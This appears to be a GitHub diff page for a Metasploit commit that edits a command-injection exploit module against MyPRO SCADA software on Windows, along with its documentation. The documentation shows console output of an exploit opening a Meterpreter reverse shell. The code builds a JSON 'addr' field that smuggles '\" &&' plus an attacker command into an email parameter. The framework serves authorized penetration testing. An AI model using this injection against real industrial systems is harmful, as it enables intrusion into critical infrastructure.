File tree Expand file tree Collapse file tree 2 files changed +2
-8
lines changed
documentation/modules/exploit/windows/scada
modules/exploits/windows/scada Expand file tree Collapse file tree 2 files changed +2
-8
lines changed Original file line number Diff line number Diff line change @@ -63,7 +63,6 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit
63
63
[*] Checking credentials...
64
64
[+] Credentials are working.
65
65
[*] Sending command injection...
66
- [*] Using randomly generated email address: [email protected]
67
66
[*] Sending stage (201798 bytes) to 192.168.1.239
68
67
[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
69
68
[*] Exploit finished, check thy shell.
Original file line number Diff line number Diff line change @@ -37,7 +37,7 @@ def initialize(info = {})
37
37
'Notes' => {
38
38
'Stability' => [ CRASH_SAFE ] ,
39
39
'Reliability' => [ REPEATABLE_SESSION ] ,
40
- 'SideEffects' => [ ARTIFACTS_ON_DISK , IOC_IN_LOGS ]
40
+ 'SideEffects' => [ IOC_IN_LOGS ]
41
41
}
42
42
)
43
43
)
@@ -130,14 +130,9 @@ def check_auth
130
130
131
131
# Send command injection
132
132
def exec_mypro ( cmd )
133
- # Generating a random email address
134
- addr = "#{ Rex ::Text . rand_text_alphanumeric ( 3 ..12 ) } @#{ Rex ::Text . rand_text_alphanumeric ( 4 ..8 ) } .com"
135
-
136
- print_status ( "Using randomly generated email address: #{ addr } " )
137
-
138
133
post_data = {
139
134
'type' => 'sendEmail' ,
140
- 'addr' => "addr \" &&#{ cmd } "
135
+ 'addr' => "#{ Rex :: Text . rand_text_alphanumeric ( 3 .. 12 ) } @ #{ Rex :: Text . rand_text_alphanumeric ( 4 .. 8 ) } .com \" &&#{ cmd } "
141
136
}
142
137
post_json = JSON . generate ( post_data )
143
138
You can’t perform that action at this time.
0 commit comments